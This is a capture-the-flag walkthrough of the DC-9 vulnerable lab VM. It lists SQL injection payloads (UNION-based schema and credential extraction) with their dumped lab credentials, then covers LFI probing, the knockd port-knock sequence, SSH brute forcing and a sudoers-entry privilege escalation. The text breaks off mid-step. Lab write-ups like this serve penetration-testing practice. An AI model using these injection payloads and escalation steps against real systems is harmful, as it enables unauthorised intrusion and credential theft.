DC: 9 — Walkthrough/Writeup
DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
Enumeration
More Enumeration…
- Enumerating the port 80:
- Nikto Scan
- Gobuster
- Manual Enumeration
— Found nothing on the website source code, But while going through the site map generate by the manual enumeration on Burp — got 2 possible injection points.
Ref: http://www.unixwiz.net/techtips/sql-injection.html
- /results.php
payload: a’ ‘x’=’x
url-encoded: %61%27%20%4f%52%20%27%78%27%3d%27%78
Then, used sqlmap to check it,
Payload: a’ union all select 1,2,3,4,5,6 — -
url-encoded: %61%27%20%75%6e%69%6f%6e%20%61%6c%6c%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2d%2d%20%2d
let’s extract the data without using sqlmap, will be listing the payloads:
- a’ OR ‘1’=’1
- a’ UNION ALL SELCT 1,2,3,4,5 — -
- a’ union all select 1,2,@@version,4,5,6 — -
- a’ union all select 1,2,3,4,5,schema_name FROM information_schema.schemata — -
- a’ union all select 1,2,3,4,table_schema,table_name FROM information_schema.tables — -
- a’ union all select 1,2,CONCAT(TABLE_SCHEMA,”:”,TABLE_NAME),3,4,5 FROM information_schema.columns — -
DB:Table
Staff:StaffDetails / Staff:Users / users:UserDetails
- a’ union all select 1,2,CONCAT(COLUMN_NAME,”:”,TABLE_SCHEMA,”:”,TABLE_NAME),3,4,5 FROM information_schema.columns — -
- a’ union all select 1,2,CONCAT(COLUMN_NAME,”:”,TABLE_SCHEMA,”:”,TABLE_NAME),3,4,5 FROM information_schema.columns where TABLE_SCHEMA=”Staff” OR TABLE_SCHEMA=”users” — -
Exfiltration
- a’ union all select 1,2,CONCAT(username,”:”,password),3,4,5 FROM Staff.Users — -
admin:856f5de590ef37314e7c3bdf6f8a66dc
- a’ union all select 1,2,CONCAT(username,”:”,password),3,4,5 FROM users.UserDetails — -
marym:3kfs86sfd
julied:468sfdfsd2
fredf:4sfd87sfd1
barneyr:RocksOff
tomc:TC&TheBoyz
jerrym:B8m#48sd
wilmaf:Pebbles
bettyr:BamBam01
chandlerb:UrAG0D!
joeyt:Passw0rd
rachelg:yN72#dsd
rossg:ILoveRachel
monicag:3248dsds7s
phoebeb:smellycats
scoots:YR3BVxxxw87
janitor:Ilovepeepee
janitor2:Hawaii-Five-0
Logging IN
admin:856f5de590ef37314e7c3bdf6f8a66dc
admin:transorbital1
File does not exist stood out to me. So i be testing for possible LFI/RFI using wfuzz.
Let’s use wfuzz to find some config files,
So, let’s see the knockd config file,
Sequence: 7469,8475,9842
Brute Force SSH
login: chandlerb password: UrAG0D!
login: joeyt password: Passw0rd
login: janitor password: Ilovepeepee
login as fredf,
searching for file test.py
Hence, i made a file with context of,
fredf ALL=(ALL) ALL
and executed the following command,